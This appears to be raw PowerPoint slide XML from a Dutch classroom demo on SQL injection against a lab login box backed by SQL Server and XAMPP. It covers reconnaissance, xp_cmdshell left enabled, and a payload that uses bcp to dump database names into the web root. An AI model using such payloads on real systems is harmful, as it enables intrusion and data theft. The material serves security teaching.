      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2913730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dirty="0" smtClean="0"/>
              <a:t>testomgeving opzetten/bekijken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Illegaal inloggen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Beschadigen van informatie (merkbaar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>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611618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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>.</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beschadigen van informatie(niet meteen merkbaar)</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991489" y="4369203"/>
            <a:ext cx="9981311" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> blijft gebruikt worden om commando's op de database uit te voeren. Bij de volgende demo's heeft het niets meer te maken met inloggen, het gaat slechts om het uitvoeren van Database commando's.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Deze keer wordt wel de hele weg afgelegd om te laten zien hoe een hacker door gebruik te maken van slimme commando's allerlei informatie uit het systeem en de database kan halen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Afbeelding 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3573277" y="2097465"/>
            <a:ext cx="4002105" cy="1516587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1514381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Vooronderzoek.</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beschadigen van informatie(niet meteen merkbaar)</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2282179" y="2111855"/>
            <a:ext cx="7364240" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Door het doen van wat vooronderzoek is het veelal niet moeilijk om er achter te komen welk merk database en welke ontwikkeltools een bedrijf gebruikt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Personeels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> advertenties geven veel informatie prijs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>In dit geval zou een hacker er achter moeten komen dat het hier om een Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> gaat en een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> webserver. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mocht dit niet uit "gewoon" onderzoek blijken, gaat de hacker over op </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>social</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>In dit geval moet de database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> wederom een fout hebben gemaakt. Hij heeft de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>zgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> XP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> shell vergeten uit te zetten. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in combinatie met de SA in PHP-code is dit uiterst ongelukkig, zal blijken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Tekstvak 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203284" y="5875791"/>
            <a:ext cx="5518685" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Open op je webserver de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>c:\xampp\htdocs folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>en bekijk de inhoud. Maak er desnoods een screenshot van</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2740369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647426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 1</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a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp_databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\xampp\htdocs\db.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -c -T' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Klik op login ........ wat gebeurt er?   Je merkt niet veel           </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659539" y="3429615"/>
            <a:ext cx="2845823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Let op de spaties.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937184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647426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Uitleg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Onderstaand commando zal ontleed worden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp_databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\xampp\htdocs\db.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -c -T' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Het zal duidelijk zijn dat je thuis moet zijn in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                      het SQL gebeuren. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>een hacker is dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8609297" y="2195387"/>
            <a:ext cx="2845823" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Maakt het mogelijk om OS commando's uit voeren.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechthoek 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532185" y="2914022"/>
            <a:ext cx="5476351" cy="492369"/>
          </a:xfrm>
          <a:prstGeom prst="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noFill/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Rechte verbindingslijn met pijl 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7335297" y="2418648"/>
            <a:ext cx="1250012" cy="495374"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0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Rechthoek 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326790" y="3444617"/>
            <a:ext cx="6988032" cy="1368543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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noFill/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Tekstvak 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10222632" y="3670837"/>
            <a:ext cx="1694713" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
